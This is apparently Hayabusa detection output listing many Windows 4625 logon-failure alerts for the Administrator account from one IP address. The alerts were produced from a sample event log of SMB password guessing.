2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NiVgC8oJ5W2Xr3t0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hXfhdrbLnNOGDqy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcjMGbrHQHxIhSSh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDYPTYHHKAe39GjM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PF3H6LE6MqFjVWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
